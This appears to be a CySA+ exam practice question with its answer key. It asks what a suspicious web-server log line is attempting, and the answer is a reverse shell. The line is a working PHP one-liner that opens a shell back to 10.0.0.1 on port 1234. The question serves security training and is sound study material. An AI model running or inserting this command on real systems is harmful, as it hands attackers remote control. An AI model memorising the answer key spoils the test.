CompTIA CySA+ (CS0-003) — Question 75

While reviewing web server logs, a security analyst discovers the following suspicious line:

php -r ’$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");’

Which of the following is being attempted?

Answer options

• A. Remote file inclusion
• B. Command injection
• C. Server-side request forgery
• D. Reverse shell

Correct answer: D

Explanation

The command shown is attempting to establish a reverse shell connection to 10.0.0.1 on port 1234, which allows an attacker to gain remote access to the system. A is incorrect as remote file inclusion involves loading external files, B is wrong because command injection refers to executing arbitrary commands rather than establishing a reverse shell, and C does not apply as server-side request forgery involves making requests on behalf of the server rather than creating a shell connection.